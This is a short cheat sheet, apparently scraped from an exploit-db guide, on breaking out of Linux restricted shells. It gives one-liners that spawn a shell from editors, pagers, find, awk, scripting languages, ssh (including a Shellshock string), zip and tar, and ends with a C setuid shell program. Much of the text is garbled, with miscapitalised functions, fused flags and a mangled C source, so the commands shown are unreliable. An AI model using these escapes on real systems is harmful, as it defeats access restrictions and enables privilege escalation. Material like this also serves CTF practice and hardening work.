Linux Restricted Shell Bypass

Author: @n4ckhcker & @h4d3sw0rm

Introduction

Hello, so first of all let's explain what's a restricted shell? A restricted shell is a shell this block/restricts some of the commands like Cd,ls,echo etc or "block" the environment Var Iables like Shell,path,user. Sometimes a restricted shell can block the commands with/or the redirecting outputs like >,>>. The types of a restricted shell can be:rbash,rksh,rsh. But what is someone want to create a restricted shell?

Let ' s say some examples:

1) to improve Security

2) to block hackers/pentesters.

3) Sometimes system administrators create a restricted shell to protect theirselves from dangerous commands.

4) for a CTF challenge. (Root-me/hackthebox/vulnhub)

Enumeration Linux Environment

Enumeration is the most important part. We need to enumeration the Linux environmental to check the "What we can do" to bypass the Rbash. We need to enumerate:

1) First we must to check for available commands like Cd/ls/echo etc.

2) We must to check for operators like >,>>,<,|.

3) We need to check for available programming languages like Perl,ruby,python etc.

4) Which commands we can run as root (sudo-l).

5) Check for files or commands with SUID perm.

6) You must-to-check in the What shell you Are:echo $SHELL you'll be in the Rbash by 90%

7) Check for the environmental variables:run env or printenv "s move into Common exploitation techniques.

Common exploitation Techniques

Now let's see some of the common exploitation techniques.

1) If "/" is allowed can run/bin/sh Or/bin/bash.

2) If You can run the CP command can copy the/bin/sh Or/bin/bash into your directory.

3) from FTP >!/bin/sh or!/bin/bash

4) from GdB >!/bin/sh or!/bin/bash

5) from More/man/less >!/bin/sh or!/bin/bash

6) from Vim >!/bin/sh or!/bin/bash

7) from Rvim >:p ython import os; Os.system ("/bin/bash")

8) from SCP > scp-s/path/yourscript x y:

9) from awk > awk ' BEGIN {System ("/bin/sh Or/bin/bash")} '

Ten) from Find > Find/-name test-exec/bin/sh or/bin/bash \;

Programming Languages Techniques

Now.. Let's look some programming languages techniques.

1) from except > except spawn sh then sh.

2) from Python > python-c ' import os; Os.system ("/bin/sh") '

3) from PHP > php-a then exec ("sh-i");

4) from Perl > perl-e ' exec '/bin/sh '; '

5) from Lua > Os.execute ('/bin/sh '). or Os.system ('/bin/bash ')

6) from Ruby > exec "/bin/sh"

7) from Java > Runtime.getRuntime.exec ("/bin/bash")

Now let's move into Advance techniques.

Advanced Techniques

Now let's move into some dirty advance techniques.

1) from ssh > ssh [email protected]-T "/bin/sh" or "/bin/bash"

2) from Ssh2 > SSH [email protected]-T "bash--noprofile"

3) from Ssh3 > SSH [email protected]-T "() {:;}; /bin/bash "(Shellshock)

4) from Ssh4 > Ssh-o proxycommand= "sh-c/tmp/yourfile.sh" 127.0.0.1 (SUID)

5) from Git > Git help status > can run it then!/bin/bash

6) from Pico > pico-s "/bin/bash" then you can write/bin/bash and then CTRL + T

7) from Zip > Zip/tmp/test.zip/tmp/test-t--unzip-command= "sh-c/bin/bash"

8) from Tar > Tar cf/dev/null testfile--checkpoint=1--checkpointaction=exec=/bin/bash

C SETUID SHELL:

#include <stdlib.h><unistd.h><stdio.h>int main (intChar  Char * *envp) {    setresgid (Getegid (), Getegid (), Getegid ());    Setresuid (Geteuid (), Geteuid (), Geteuid ());    Execve ("/bin/bash", ARGV,ENVP);     return 0 ;}

Referer:

Https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

Linux Restricted Shell Bypass